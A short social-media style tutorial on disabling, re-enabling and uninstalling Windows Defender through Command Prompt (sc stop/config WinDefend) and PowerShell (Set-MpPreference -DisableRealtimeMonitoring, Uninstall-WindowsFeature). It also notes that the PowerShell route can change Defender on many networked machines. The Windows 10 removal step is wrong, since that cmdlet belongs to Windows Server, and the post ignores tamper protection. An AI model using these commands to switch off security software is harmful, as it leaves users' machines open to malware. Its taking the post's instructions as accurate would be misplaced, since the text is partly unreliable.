▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 DISABLE WINDOWS DEFENDER USING CMD :
instagram.com/UndercodeTesting

> Using Command Prompt
1) Open command prompt with administrative privileges

2) Run the following command to disable Windows Defender:
sc stop WinDefend

3) To enable Windows defender again, run the following command:
sc start WinDefend

4) Please note that this is a temporary method to stop Windows Defender. The service will return to its original state when the system is restarted. To disable Windows Defender permanently using command prompt, run the following command:

> sc config WinDefend start= disabled

> sc stop WinDefend

5) To enable it again on startup, run the following commands:

sc config WinDefend start= auto
sc start WinDefend

6) If you want to check the current state of Windows Defender service, run the following command:

> sc query WinDefend

Check the STATE variable. It should be in RUNNING state if it is enabled.


🦑 Using PowerShell
One advantage of PowerShell is that you can deploy changes to Windows Defender on multiple computers over the network.

If you prefer PowerShell way, follow the steps below:

1) Run PowerShell with administrative privileges (Windows key + X + A)
To disable real-time monitoring of Windows Defender, run the following command:

2) Set-MpPreference -DisableRealtimeMonitoring $true

3) To enable real-time monitoring, run the following command:

4) Set-MpPreference -DisableRealtimeMonitoring $false

5) The above method will only turn off real-time monitoring of Windows Defender. If you want to completely remove Windows Defender from Windows 10, use the following PowerShell command:

> Uninstall-WindowsFeature -Name Windows-Defender

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁